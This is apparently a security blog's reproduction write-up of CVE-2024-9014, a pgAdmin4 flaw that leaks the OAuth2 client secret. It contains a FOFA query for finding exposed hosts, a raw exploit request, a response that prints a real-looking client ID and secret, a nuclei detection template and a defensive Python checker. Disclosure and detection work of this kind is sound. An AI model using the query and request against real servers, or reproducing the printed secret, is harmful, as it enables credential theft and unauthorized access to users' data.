CVE-2024-9014

Original article by fgz, AI与网安, 2024-10-07 17:39

This article is shared as study notes for technical learning and reference only; do not use it for unlawful purposes. Any direct or indirect consequences or losses caused by any individual or organization using the information provided here are the sole responsibility of the user and have nothing to do with the author!

01 Vulnerability Name

pgAdmin4 OAuth2 client ID and client secret sensitive information disclosure vulnerability

02 Affected Versions

pgAdmin4 8.9-3.fc40

pgAdmin4 8.12-1.fc41

03 Vulnerability Description

pgAdmin4 is the graphical administration tool for the open-source PostgreSQL database. In 2024, CVE-2024-9014, a pgAdmin 4 OAuth2 client ID and client secret sensitive information disclosure vulnerability, was publicly disclosed. An attacker can craft a malicious request to obtain the OAuth2 client ID and secret, which can lead to unauthorized access to other users' data. The vendor has released a security update and recommends upgrading to the latest version.

04 FOFA Search Query

icon_hash="1502815117"

05 Vulnerability Reproduction

Send the following request to the lab target:

GET /login?next=/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27
Connection: close
Accept-Encoding: gzip

The response is as follows:

HTTP/1.1 200 OK
Connection: close
Content-Security-Policy: default-src ws: http: data: blob: 'unsafe-inline' 'unsafe-eval';
Content-Type: text/html; charset=utf-8
Date: Mon, 07 Oct 2024 09:28:35 GMT
Server: gunicorn
Set-Cookie: pga4_session=363dd09a-fee5-403e-8e8f-d55680b3f182!eZ4oYiB5uSYYlK/N7KtvaLk4R1o5eKkz48mHvSualtk=; Expires=Tue, 08 Oct 2024 09:28:35 GMT; HttpOnly; Path=/; SameSite=Lax
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block

<!DOCTYPE html>
...
<script type="application/javascript">
            try {
    require(
        ['security.pages'],
        function() {
            window.renderSecurityPage('login_user', {"authSources": ["oauth2", "internal"], "authSourcesEnum": {"KERBEROS": "kerberos", "OAUTH2": "oauth2"}, "csrfToken": "ImY1NzA1ZmZkMWYzNDAyYzg1ZmU2ZGE5OTE3NDhhOTU1ZTBiOWM2Yzki.ZwOpww.lo_Rs3jMAy_gm5G4_Z6c-q7ISdc", "forgotPassUrl": "/browser/reset_password", "langOptions": [{"label": "English", "value": "en"}, {"label": "Chinese (Simplified)", "value": "zh"}, {"label": "Czech", "value": "cs"}, {"label": "French", "value": "fr"}, {"label": "German", "value": "de"}, {"label": "Indonesian", "value": "id"}, {"label": "Italian", "value": "it"}, {"label": "Japanese", "value": "ja"}, {"label": "Korean", "value": "ko"}, {"label": "Polish", "value": "pl"}, {"label": "Portuguese (Brazilian)", "value": "pt_BR"}, {"label": "Russian", "value": "ru"}, {"label": "Spanish", "value": "es"}], "loginBanner": "", "loginUrl": "/authenticate/login", "oauth2Config": [{"OAUTH2_API_BASE_URL": "https://graph.microsoft.com/oidc/userinfo", "OAUTH2_AUTHORIZATION_URL": "https://login.microsoftonline.com/81464583-3a2a-4b1b-9b3e-886fa00de22b/oauth2/v2.0/authorize", "OAUTH2_BUTTON_COLOR": "#0000ff", "OAUTH2_CLIENT_ID": "91a5b302-7076-4ab8-ae36-8ce782204f2f", "OAUTH2_CLIENT_SECRET": "5uE8Q~3RDpIEk2LfpFttHtBFtdfDMXF-aAKcDa5h", "OAUTH2_DISPLAY_NAME": "Microsoft", "OAUTH2_ICON": "fa-microsoft", "OAUTH2_NAME": "microsoft", "OAUTH2_SCOPE": "openid email", "OAUTH2_SERVER_METADATA_URL": "https://login.microsoftonline.com/81464583-3a2a-4b1b-9b3e-886fa00de22b/v2.0/.well-known/openid-configuration", "OAUTH2_TOKEN_URL": "https://login.microsoftonline.com/81464583-3a2a-4b1b-9b3e-886fa00de22b/oauth2/v2.0/token", "OAUTH2_USERINFO_ENDPOINT": "userinfo"}], "userLanguage": "en"},
                {"messages": []});
        }, function() {
            console.log(arguments);

The response body contains the sensitive OAuth2 configuration (client ID and client secret); reproduction complete.

06 nuclei POC

The POC file content is as follows:

id: CVE-2024-9014

info:
  name: pgAdmin 4 - Authentication Bypass
  author: s4e-io
  severity: critical
  description: |
    pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.
  reference:
    - https://github.com/EQSTLab/CVE-2024-9014
    - https://github.com/pgadmin-org/pgadmin4/issues/7945
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9014
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2024-9014
    cwe-id: CWE-522
    epss-score: 0.00043
    epss-percentile: 0.09595
  metadata:
    verified: true
    max-request: 1
    vendor: pgadmin-org
    product: pgadmin4
    fofa-query: "pgadmin4"
  tags: cve,cve2024,pgadmin,exposure,auth-bypass

http:
  - raw:
      - |
        GET /login?next=/ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        negative: true
        regex:
          - 'OAUTH2_CLIENT_SECRET": null'

      - type: word
        part: body
        words:
          - '<title>pgAdmin 4</title>'
          - 'OAUTH2_CLIENT_SECRET'
        condition: and

      - type: status
        status:
          - 200

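A defender-side check for the same condition that the reproduction section and the nuclei matchers above test for, written as an added Python example that is not part of the original article or of the pgAdmin project: it parses the JSON object the login page passes to renderSecurityPage and reports any OAuth2 provider whose client secret is rendered into the HTML, while treating a null secret (the value the nuclei negative matcher excludes) as not exposed. The two page bodies are constructed samples modelled on the response shown above, with placeholder identifiers instead of real credentials.

```python
import json
import re

# Constructed sample modelled on the response above; IDs and secret are placeholders.
VULNERABLE_BODY = """<html><head><title>pgAdmin 4</title></head><body><script>
window.renderSecurityPage('login_user', {"authSources": ["oauth2", "internal"],
  "oauth2Config": [{"OAUTH2_NAME": "microsoft",
  "OAUTH2_CLIENT_ID": "00000000-0000-0000-0000-000000000000",
  "OAUTH2_CLIENT_SECRET": "PLACEHOLDER-SECRET"}], "userLanguage": "en"},
  {"messages": []});
</script></body></html>"""

# Same page from a build that keeps the secret server-side: the key is still
# rendered, but as null (the value the nuclei negative matcher excludes).
PATCHED_BODY = VULNERABLE_BODY.replace('"PLACEHOLDER-SECRET"', 'null')

def _balanced_object(text, start):
    # Walk from the opening brace to its match, ignoring braces inside strings.
    depth, in_str, esc = 0, False, False
    for off, ch in enumerate(text[start:]):
        if in_str:
            if esc:
                esc = False
            elif ch == "\\":
                esc = True
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
        elif ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                return text[start:start + off + 1]
    raise ValueError("unterminated object in login page")

def login_page_config(body):
    # First argument of renderSecurityPage('login_user', ...), or None if absent.
    m = re.search(r"renderSecurityPage\('login_user',\s*", body)
    if not m:
        return None
    return json.loads(_balanced_object(body, m.end()))

def exposed_oauth2_secrets(body):
    # Names of OAuth2 providers whose client secret is embedded in the page.
    cfg = login_page_config(body) or {}
    return [p.get("OAUTH2_NAME", "<unnamed>") for p in cfg.get("oauth2Config", [])
            if p.get("OAUTH2_CLIENT_SECRET") is not None]
```

Run it against the body of your own instance's /login page before and after upgrading; a non-empty result means the secret is still being shipped to every unauthenticated visitor.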
07 Remediation

Upgrade to the latest version.